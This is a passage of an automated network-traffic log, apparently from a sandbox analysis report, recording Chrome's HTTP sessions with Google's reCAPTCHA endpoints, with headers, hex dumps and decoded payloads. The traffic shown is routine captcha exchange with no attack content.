                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Content-Type: application/x-protobuffer
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://www.google.com
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-12-19 16:08:17 UTC9204OUTData Raw: 0a 18 6e 68 61 6d 68 66 41 36 6e 5f 68 4b 4d 61 5f 59 37 55 70 46 79 41 33 37 12 ce 0f 30 33 41 46 63 57 65 41 34 43 56 56 6d 72 34 52 4c 54 62 6d 65 70 51 2d 39 74 7a 48 67 7a 46 47 6d 65 76 37 55 6b 7a 30 6d 4f 2d 5a 56 79 45 4d 58 4c 46 79 74 75 64 64 68 64 34 41 77 78 4a 51 77 56 2d 73 77 5f 75 61 78 61 58 75 63 45 73 48 50 62 66 30 4c 74 36 38 61 4b 6a 75 46 36 47 6e 6d 46 2d 48 62 4c 38 75 71 6f 35 6d 4b 51 61 66 4b 62 54 67 78 49 76 4d 4c 6e 48 55 7a 45 39 6b 59 2d 51 46 53 61 31 71 73 4c 32 5a 34 6c 48 46 2d 2d 63 56 33 43 46 30 58 52 36 6e 6f 6e 5a 37 32 65 35 52 79 38 73 4e 4e 76 6d 71 65 30 33 33 7a 4d 4a 41 36 36 33 70 6e 6c 47 67 44 75 73 76 4d 65 45 4d 35 4f 31 43 78 67 4b 69 33 6a 5a 65 68 71 4b 5f 2d 67 69 69 37 69 65 70 4c 42 4a 5f 49 56
                                                                                                                          Data Ascii: nhamhfA6n_hKMa_Y7UpFyA3703AFcWeA4CVVmr4RLTbmepQ-9tzHgzFGmev7Ukz0mO-ZVyEMXLFytuddhd4AwxJQwV-sw_uaxaXucEsHPbf0Lt68aKjuF6GnmF-HbL8uqo5mKQafKbTgxIvMLnHUzE9kY-QFSa1qsL2Z4lHF--cV3CF0XR6nonZ72e5Ry8sNNvmqe033zMJA663pnlGgDusvMeEM5O1CxgKi3jZehqK_-gii7iepLBJ_IV
                                                                                                                          2024-12-19 16:08:17 UTC1000INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:17 GMT
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Set-Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0; Expires=Tue, 17-Jun-2025 16:08:17 GMT; Path=/recaptcha; Secure; HttpOnly; Priority=HIGH; SameSite=none
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:17 GMT
                                                                                                                          Cache-Control: private
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:17 UTC390INData Raw: 34 30 34 32 0d 0a 29 5d 7d 27 0a 5b 22 72 72 65 73 70 22 2c 22 30 33 41 46 63 57 65 41 35 7a 6f 44 48 42 6d 4c 76 6a 72 53 45 30 7a 49 49 6d 72 4a 58 46 5a 76 65 56 71 64 37 31 56 73 79 70 49 54 55 4d 51 52 4e 31 6f 35 56 50 58 58 78 4f 74 53 46 6d 6b 58 33 78 72 52 62 70 67 57 69 4a 4b 4f 2d 66 42 4a 6e 41 4a 30 2d 56 50 6c 6e 6d 4c 71 43 73 30 49 58 77 43 6e 4d 57 6c 67 62 48 58 32 76 54 55 6b 38 47 4c 74 52 58 74 6a 68 6e 2d 36 2d 5a 67 66 4a 68 68 54 4d 75 69 4e 67 31 4f 78 47 53 5f 71 4d 63 42 57 46 39 56 66 6f 77 50 4c 68 64 6c 34 46 56 6a 6a 35 76 79 6d 51 78 51 75 4d 38 43 66 71 7a 42 39 41 55 55 6f 78 62 58 6c 70 6e 64 46 5f 6a 30 6e 77 54 65 49 46 64 64 32 6d 62 74 51 6c 63 6e 56 73 39 39 63 62 66 4d 5a 68 38 33 55 46 4c 79 44 46 61 64 38 46 72
                                                                                                                          Data Ascii: 4042)]}'["rresp","03AFcWeA5zoDHBmLvjrSE0zIImrJXFZveVqd71VsypITUMQRN1o5VPXXxOtSFmkX3xrRbpgWiJKO-fBJnAJ0-VPlnmLqCs0IXwCnMWlgbHX2vTUk8GLtRXtjhn-6-ZgfJhhTMuiNg1OxGS_qMcBWF9VfowPLhdl4FVjj5vymQxQuM8CfqzB9AUUoxbXlpndF_j0nwTeIFdd2mbtQlcnVs99cbfMZh83UFLyDFad8Fr
                                                                                                                          2024-12-19 16:08:17 UTC1390INData Raw: 49 31 74 64 4a 45 33 66 58 74 76 64 7a 58 34 45 42 43 61 32 61 2d 76 53 74 50 66 58 68 4b 41 4c 54 37 31 42 74 51 54 52 58 54 72 6c 58 6f 62 6a 51 78 4e 6a 39 6d 68 73 66 66 49 67 58 68 50 4c 33 43 66 52 56 6a 51 71 36 58 64 39 61 55 53 67 5f 32 36 53 55 63 56 75 37 79 58 66 6f 5a 7a 57 50 39 52 59 52 6e 7a 66 34 65 42 58 5f 43 41 4a 47 41 47 42 6b 6b 64 62 50 78 57 64 4c 78 47 5a 62 32 5f 38 5f 63 69 4b 77 4a 52 4b 5f 57 78 68 7a 4c 79 75 70 45 52 41 79 4b 56 67 65 37 34 6a 49 74 33 50 65 76 58 4e 39 61 6c 4c 43 70 6b 79 51 64 58 73 59 30 4b 6a 43 64 56 36 52 65 54 2d 75 45 64 50 77 41 2d 44 4a 39 73 65 41 6d 70 70 4b 54 63 31 66 66 56 74 2d 44 6f 47 68 6e 44 4f 39 53 47 52 51 55 63 5a 68 45 45 77 39 41 64 73 62 5f 32 43 4f 74 4e 6a 6a 34 68 44 30 35 31
                                                                                                                          Data Ascii: I1tdJE3fXtvdzX4EBCa2a-vStPfXhKALT71BtQTRXTrlXobjQxNj9mhsffIgXhPL3CfRVjQq6Xd9aUSg_26SUcVu7yXfoZzWP9RYRnzf4eBX_CAJGAGBkkdbPxWdLxGZb2_8_ciKwJRK_WxhzLyupERAyKVge74jIt3PevXN9alLCpkyQdXsY0KjCdV6ReT-uEdPwA-DJ9seAmppKTc1ffVt-DoGhnDO9SGRQUcZhEEw9Adsb_2COtNjj4hD051
                                                                                                                          2024-12-19 16:08:17 UTC1390INData Raw: 34 43 4c 73 32 6f 6d 43 56 35 71 73 38 72 57 41 6f 78 6d 38 58 76 44 70 53 78 77 6a 39 70 61 75 4c 47 41 6e 53 79 70 7a 53 6d 38 39 66 4f 30 58 4f 32 33 41 6c 4d 4f 59 4b 4f 38 6f 59 39 45 70 64 71 35 4a 55 63 74 6e 51 4a 42 50 79 79 55 55 4d 45 47 71 53 6e 59 36 42 47 33 32 42 62 67 4b 72 47 4f 36 54 51 4c 31 33 79 79 73 39 35 6a 4c 62 52 47 69 4c 70 48 74 62 33 63 36 53 6f 33 39 53 38 68 70 49 62 31 43 39 51 63 2d 45 37 65 74 6a 4e 37 58 4b 70 4a 5a 72 5a 4a 5a 45 74 46 5f 7a 71 41 6e 4a 30 50 4b 4e 33 43 5f 61 4b 37 61 46 56 48 52 6a 79 33 6b 5a 69 35 39 78 73 63 76 69 4a 61 6e 73 56 49 71 46 4d 78 41 51 31 67 41 71 6b 62 78 39 65 5f 64 30 52 77 31 78 65 5a 32 73 6b 36 63 6f 43 54 35 74 57 38 6e 69 34 68 2d 70 32 59 41 5f 78 6f 37 5f 2d 44 4f 67 36 54
                                                                                                                          Data Ascii: 4CLs2omCV5qs8rWAoxm8XvDpSxwj9pauLGAnSypzSm89fO0XO23AlMOYKO8oY9Epdq5JUctnQJBPyyUUMEGqSnY6BG32BbgKrGO6TQL13yys95jLbRGiLpHtb3c6So39S8hpIb1C9Qc-E7etjN7XKpJZrZJZEtF_zqAnJ0PKN3C_aK7aFVHRjy3kZi59xscviJansVIqFMxAQ1gAqkbx9e_d0Rw1xeZ2sk6coCT5tW8ni4h-p2YA_xo7_-DOg6T
                                                                                                                          2024-12-19 16:08:17 UTC1390INData Raw: 77 6a 49 76 6d 2d 38 4e 51 59 6b 69 79 75 75 71 57 33 38 51 73 47 63 41 36 6f 61 5f 77 66 6a 49 35 63 65 79 49 30 31 73 4b 41 56 74 36 50 50 61 4b 44 7a 4e 32 6d 6a 65 6b 6f 53 78 4f 46 53 41 64 48 55 73 4c 4b 46 59 57 43 63 66 56 78 6d 71 66 4c 6f 4c 64 61 55 70 4e 4c 54 58 52 63 54 46 49 42 49 6e 30 70 63 4c 43 76 65 55 39 56 55 69 69 68 52 6d 69 63 77 57 72 45 6d 74 74 6a 78 76 72 78 37 45 41 64 77 42 4c 51 52 4c 49 79 74 75 68 31 4d 4c 6d 5a 50 32 54 4b 6a 4d 41 49 73 59 6b 42 56 37 76 58 50 37 64 72 70 49 70 35 4b 55 2d 6e 77 52 4b 61 44 54 68 63 71 6f 30 63 51 74 67 52 39 41 59 38 4c 31 6a 4f 70 49 53 50 75 4d 6b 53 50 4c 50 34 32 4b 6b 56 4d 4d 5f 38 39 37 56 56 2d 44 34 6f 47 6d 63 57 50 46 69 6c 71 52 41 52 70 51 4e 48 51 4d 61 67 6c 41 73 76 72
                                                                                                                          Data Ascii: wjIvm-8NQYkiyuuqW38QsGcA6oa_wfjI5ceyI01sKAVt6PPaKDzN2mjekoSxOFSAdHUsLKFYWCcfVxmqfLoLdaUpNLTXRcTFIBIn0pcLCveU9VUiihRmicwWrEmttjxvrx7EAdwBLQRLIytuh1MLmZP2TKjMAIsYkBV7vXP7drpIp5KU-nwRKaDThcqo0cQtgR9AY8L1jOpISPuMkSPLP42KkVMM_897VV-D4oGmcWPFilqRARpQNHQMaglAsvr
                                                                                                                          2024-12-19 16:08:17 UTC1390INData Raw: 62 5f 36 6f 71 72 48 66 44 51 6e 6c 5a 74 76 59 64 50 43 6a 4b 47 45 5f 75 34 50 2d 6a 34 2d 44 5f 64 6d 30 5a 67 49 36 4b 64 51 78 68 44 76 72 35 33 45 45 6b 53 57 53 72 61 63 43 35 36 49 6f 32 46 70 6b 69 74 53 44 6b 72 44 52 37 4b 34 5a 4d 37 70 31 66 34 6d 74 57 4b 42 47 2d 4b 35 6a 73 4e 52 32 4d 6b 30 53 6b 62 50 7a 67 57 73 4f 73 67 4e 5a 33 50 55 49 36 53 49 78 51 44 59 66 70 36 44 4a 75 57 54 64 61 77 35 48 57 43 36 6b 4c 66 4e 4f 38 62 73 73 47 6f 43 31 6b 42 58 63 34 77 57 4f 79 71 72 52 65 5a 57 73 64 39 73 56 34 7a 4e 53 58 66 30 4e 54 41 52 63 6e 5a 44 64 53 74 57 35 31 31 51 76 6f 73 68 6b 50 59 36 54 4c 37 36 41 79 43 6f 7a 77 78 39 56 35 30 50 76 64 65 41 56 72 64 36 56 61 63 4d 34 43 79 6f 34 4f 66 7a 46 78 70 42 76 6b 58 75 79 74 4e 36
                                                                                                                          Data Ascii: b_6oqrHfDQnlZtvYdPCjKGE_u4P-j4-D_dm0ZgI6KdQxhDvr53EEkSWSracC56Io2FpkitSDkrDR7K4ZM7p1f4mtWKBG-K5jsNR2Mk0SkbPzgWsOsgNZ3PUI6SIxQDYfp6DJuWTdaw5HWC6kLfNO8bssGoC1kBXc4wWOyqrReZWsd9sV4zNSXf0NTARcnZDdStW511QvoshkPY6TL76AyCozwx9V50PvdeAVrd6VacM4Cyo4OfzFxpBvkXuytN6
                                                                                                                          2024-12-19 16:08:17 UTC1390INData Raw: 6d 69 63 22 2c 6e 75 6c 6c 2c 5b 22 62 67 64 61 74 61 22 2c 22 4c 79 39 33 64 33 63 75 5a 32 39 76 5a 32 78 6c 4c 6d 4e 76 62 53 39 71 63 79 39 69 5a 79 39 59 5a 54 64 42 59 6d 68 6f 55 47 5a 61 59 30 56 70 61 32 39 4f 62 57 68 6e 61 45 4a 59 51 55 56 6f 54 33 56 7a 52 45 6c 43 53 31 64 4c 55 31 39 79 62 31 4d 30 55 54 64 46 4c 6d 70 7a 22 2c 22 22 2c 22 62 46 56 61 63 6b 55 78 52 6b 52 34 53 58 70 43 53 48 4e 58 54 57 63 77 56 6b 4e 4c 4e 6c 46 7a 4f 44 41 34 4f 55 74 45 4e 6d 46 51 5a 53 74 47 63 48 6c 68 57 45 5a 54 59 6d 77 7a 62 7a 42 51 4d 46 6c 59 56 47 56 59 63 33 5a 55 4e 30 5a 47 4d 57 35 54 52 57 49 32 52 55 52 32 4b 31 49 76 56 31 55 72 52 56 46 6e 4f 45 70 78 52 44 49 35 56 33 6c 74 4f 56 55 76 55 56 46 56 59 6d 35 69 4b 31 64 6b 5a 48 56 72
                                                                                                                          Data Ascii: mic",null,["bgdata","Ly93d3cuZ29vZ2xlLmNvbS9qcy9iZy9YZTdBYmhoUGZaY0Vpa29ObWhnaEJYQUVoT3VzRElCS1dLU19yb1M0UTdFLmpz","","bFVackUxRkR4SXpCSHNXTWcwVkNLNlFzODA4OUtENmFQZStGcHlhWEZTYmwzbzBQMFlYVGVYc3ZUN0ZGMW5TRWI2RUR2K1IvV1UrRVFnOEpxRDI5V3ltOVUvUVFVYm5iK1dkZHVr
                                                                                                                          2024-12-19 16:08:17 UTC1390INData Raw: 5a 5a 55 70 73 4f 45 4a 47 62 30 4a 4f 4d 55 31 53 59 55 6c 44 55 6a 45 72 59 33 4a 53 4e 57 31 5a 51 6b 51 78 51 57 70 79 4e 57 4e 33 4e 45 6b 77 57 54 52 68 4d 6c 5a 78 56 47 46 43 53 58 59 77 51 6e 46 49 51 6e 52 4b 63 54 56 74 54 31 5a 45 57 44 6b 7a 5a 58 68 32 64 55 39 6d 56 54 46 77 4d 6a 46 33 4e 6e 4e 61 61 58 64 76 54 58 67 33 64 6e 51 33 65 56 70 4e 52 45 49 7a 4e 55 6c 51 54 44 68 52 55 45 78 6c 61 32 78 6c 4d 57 49 32 55 6a 4a 36 4e 30 35 6d 52 31 41 31 4d 57 59 30 64 45 5a 52 53 6a 4d 78 4f 46 70 6f 62 32 46 79 62 6e 4e 6f 64 6a 64 6f 51 33 4a 48 4e 6d 35 56 64 33 41 78 56 33 64 7a 62 48 68 30 4e 7a 46 4e 59 57 64 6b 55 31 52 75 55 32 74 6c 62 46 68 36 65 6b 55 35 54 6e 64 55 59 79 74 6a 52 46 56 6d 53 58 5a 6d 63 6b 56 4f 52 46 70 4a 4e 33
                                                                                                                          Data Ascii: ZZUpsOEJGb0JOMU1SYUlDUjErY3JSNW1ZQkQxQWpyNWN3NEkwWTRhMlZxVGFCSXYwQnFIQnRKcTVtT1ZEWDkzZXh2dU9mVTFwMjF3NnNaaXdvTXg3dnQ3eVpNREIzNUlQTDhRUExla2xlMWI2UjJ6N05mR1A1MWY0dEZRSjMxOFpob2FybnNodjdoQ3JHNm5Vd3AxV3dzbHh0NzFNYWdkU1RuU2tlbFh6ekU5TndUYytjRFVmSXZmckVORFpJN3
                                                                                                                          2024-12-19 16:08:17 UTC1390INData Raw: 32 35 79 65 53 74 68 51 6a 6c 79 59 6e 4a 69 51 6b 59 7a 52 7a 4e 73 57 54 42 34 4f 56 64 76 63 44 56 70 4f 44 6c 4e 4d 47 4a 51 51 58 5a 50 59 6d 39 61 4d 6a 63 7a 63 55 70 70 57 47 68 69 64 6e 52 31 51 7a 6b 76 59 30 64 52 55 6e 4e 36 63 6b 46 57 52 31 42 72 56 30 68 6a 52 6d 67 76 4d 55 4a 43 51 33 70 54 65 6d 4e 73 4d 44 42 77 64 47 52 7a 65 45 52 75 56 32 5a 31 4f 58 4a 4a 65 56 56 47 55 6e 52 30 62 6d 77 33 5a 45 5a 6d 4e 55 46 73 64 32 52 44 57 6e 56 69 65 48 45 32 64 6a 42 69 52 32 52 45 55 47 56 61 63 55 56 44 56 46 68 48 62 46 5a 55 59 33 56 6a 5a 54 64 4c 56 45 56 30 4d 6d 35 5a 4d 30 77 78 65 56 64 35 64 6d 56 30 54 56 52 48 57 57 52 30 56 32 6c 53 61 30 4e 31 55 30 6c 74 55 48 5a 48 54 6b 63 35 55 30 68 6b 54 57 4a 79 51 58 64 79 53 46 70 50
                                                                                                                          Data Ascii: 25yeSthQjlyYnJiQkYzRzNsWTB4OVdvcDVpODlNMGJQQXZPYm9aMjczcUppWGhidnR1QzkvY0dRUnN6ckFWR1BrV0hjRmgvMUJCQ3pTemNsMDBwdGRzeERuV2Z1OXJJeVVGUnR0bmw3ZEZmNUFsd2RDWnVieHE2djBiR2REUGVacUVDVFhHbFZUY3VjZTdLVEV0Mm5ZM0wxeVd5dmV0TVRHWWR0V2lSa0N1U0ltUHZHTkc5U0hkTWJyQXdySFpP
                                                                                                                          2024-12-19 16:08:17 UTC1390INData Raw: 4a 65 44 4e 54 4c 7a 6c 61 65 6d 70 34 64 58 63 33 4f 58 6c 57 53 6d 6f 34 4e 6b 4a 4f 64 58 5a 72 65 47 46 61 54 6b 31 36 57 44 46 68 54 58 70 31 54 55 46 59 62 6c 64 79 62 44 56 72 65 58 63 34 57 6b 39 50 53 47 5a 57 61 47 56 43 59 6a 4a 48 56 33 42 44 61 44 4e 4c 55 33 6c 6d 4e 6d 34 33 63 45 74 33 56 6c 6c 4d 51 56 46 74 53 6d 78 42 55 46 56 5a 51 30 4a 51 53 44 4e 77 61 57 55 76 53 6e 70 6f 61 6a 64 71 4d 54 46 49 65 45 4e 74 57 47 6f 76 54 69 39 34 5a 45 74 50 64 7a 52 4c 57 45 39 69 64 6b 78 30 52 6e 70 50 57 56 52 31 4e 6b 77 35 59 54 6c 71 61 58 67 77 63 45 51 7a 52 57 34 34 4f 46 46 53 63 6b 35 74 54 7a 56 53 56 6d 56 4b 51 58 55 76 52 53 39 50 63 6c 6c 47 64 55 31 36 51 6c 5a 4a 63 45 6f 79 56 54 56 76 61 33 55 32 61 46 68 69 54 44 56 7a 61 57
                                                                                                                          Data Ascii: JeDNTLzlaemp4dXc3OXlWSmo4NkJOdXZreGFaTk16WDFhTXp1TUFYbldybDVreXc4Wk9PSGZWaGVCYjJHV3BDaDNLU3lmNm43cEt3VllMQVFtSmxBUFVZQ0JQSDNwaWUvSnpoajdqMTFIeENtWGovTi94ZEtPdzRLWE9idkx0RnpPWVR1Nkw5YTlqaXgwcEQzRW44OFFSck5tTzVSVmVKQXUvRS9PcllGdU16QlZJcEoyVTVva3U2aFhiTDVzaW


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.1649742172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:19 UTC606OUTGET /recaptcha/api2/reload?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:20 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                          Pragma: no-cache
                                                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:20 GMT
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Allow: POST
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Accept-Ranges: none
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          Connection: close
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          2024-12-19 16:08:20 UTC647INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                          Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                          2024-12-19 16:08:20 UTC1024INData Raw: 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64
                                                                                                                          Data Ascii: body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background
                                                                                                                          2024-12-19 16:08:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.1649747172.217.19.2284437164C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-12-19 16:08:19 UTC1148OUTGET /recaptcha/api2/payload?p=06AFcWeA6QB-xLWne_hEDWfQLtaaXIAmjra0Yu8cyWFqHWUIvK-sIL_JWaAR1nScLYHenHKcYJitr0hKm3HAXhFbXc_EKg4LBFbKroGCMf4Ru57BPA8nbWyamUlibCqmSl5FetcxEu7XgmTKmQ53DTV7WLK390J0d3liYPbUPlChD8XXJTZxLF0W65AgR-UzNdXgTinnpnX1gU&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1
                                                                                                                          Host: www.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          Cookie: _GRECAPTCHA=09AJNbFneNSqat1ZbpKokQxYKQXp1KKXwagCdXwlh5w0SuQfHsRS0Z8YaXux7h7Tj2nzVEp2aHOT5d71-9Ty0sTD0
                                                                                                                          2024-12-19 16:08:20 UTC681INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Expires: Thu, 19 Dec 2024 16:08:20 GMT
                                                                                                                          Date: Thu, 19 Dec 2024 16:08:20 GMT
                                                                                                                          Cache-Control: private, max-age=30
                                                                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                          Cross-Origin-Resource-Policy: same-site
                                                                                                                          Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Server: ESF
                                                                                                                          X-XSS-Protection: 0
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close
